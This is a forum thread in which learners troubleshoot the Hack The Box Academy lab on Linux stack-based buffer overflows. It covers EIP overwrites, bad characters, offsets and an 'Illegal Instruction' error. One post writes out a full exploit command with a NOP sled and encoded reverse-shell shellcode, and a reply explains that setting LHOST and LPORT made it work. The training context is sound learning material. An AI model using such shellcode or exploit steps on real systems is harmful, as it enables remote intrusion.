HTB academy - Linux buffer overflows

Hi all,
I am working on the academy for stack-based buffer overflows for linux. I went through the entire module multiple times but I get stuck at the point where the actual code should run and give me a reverse shell.

The last try I just copied the commands as they were provided in the walkthrough but it doesn’t work. When I check only part of my shellcode is executed.

On the left you see the executed command (highlighted in yellow where the issue is). On the right you see what actually is executed. So after the /x04/x03 is executes other code then my shellcode.

Can anybody give me a hint in the right direction? :slight_smile:

The issue seems to be with my EIP pointer. It gets another value then the one I provide. when I make it all /xff the EIP is overwritten correctly but any other value does not go through correctly. I tried multiple return addresses that contain my NOPS.

I haven’t done the module yet, but I have had a few run ins with BOFs. Have you triple checked bad characters? That seems to be the step that always screws me over.

Hi onthesauce, thanks for your reply. I did indeed check the bad characters, it is part of the module :slight_smile:

I finally found the issue after stepping away from the computer a couple of hours. Let me just say I was completely looking in the wrong direction for the issue. I did just a little bit to much copy paste from the examples.

Great module by the way, this was my first contact with buffer overflows :smiley:

No worries! Haha, I have definitely done the same thing. Lesson learned.

Hi @eddioot. I’m doing the final assessment and came across the same situation as you did.
I found the offset, checked the bad chars, got the shellcode payload, but cannot set the correct EIP.

When i set the EIP to “/x66” * 4, it works. But when I provide the address of one of the NOPS, the EIP always goes wrong. May i know how you finally solved this?

I will ask again like @Isytmu0792.
I checked my payload, have a 0x66666666 on EIP
When I try for example:

$(python -c ‘print “\x55” * (2060 - 100 - 95) + “\x90” * 100 + “\xb8\xc5\xb3\xda\xaf\xdd\xc4\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x12\x83\xc6\x04\x31\x46\x0e\x03\x83\xbd\x38\x5a\x3a\x19\x4b\x46\x6f\xde\xe7\xe3\x8d\x69\xe6\x44\xf7\xa4\x69\x37\xae\x86\x55\xf5\xd0\xae\xd0\xfc\xb8\x4f\x23\xff\x39\xd8\x21\xff\x43\x71\xaf\x1e\x03\xe7\xff\xb1\x30\x5b\xfc\xb8\x57\x56\x83\xe9\xff\x07\xab\x7e\x97\xbf\x9c\xaf\x05\x29\x6a\x4c\x9b\xfa\xe5\x72\xab\xf6\x38\xf4” + “\x66\x66\x66\x66”’) and look the offset of my NOP I replace \x66 by this for example \x68\xd6\xff\xff.
I have always the same error: Illegal Instruction. I dont understand what is my error, I generated 3 times my payload to be sure and I don’t have another bad characters (\x00\x09\x0a\x20)
What can be the problem ?

Thank you

So for people who have some problem and like me Illegal Instruction:
I change the ip for the LHOST (I put and I replace it with my Tun0) and for the LPORT and put 4444.
I regenerate the payload, and it worked.
Hope it works for you too.

great subject but as usual the module is full of mistakes. the most misleading one is when they tell you that to reach the EIP 1040 bytes while in reality you need 1036. the 1040 includes the EIP. if you don’t pay attention then you end up with an offset of 4 bytes when you’re trying to the skill assessment. i mean, the constant mistakes in the modules are a good way to force you to learn :joy::joy::joy: but it’s super frustrating for n00bs like me.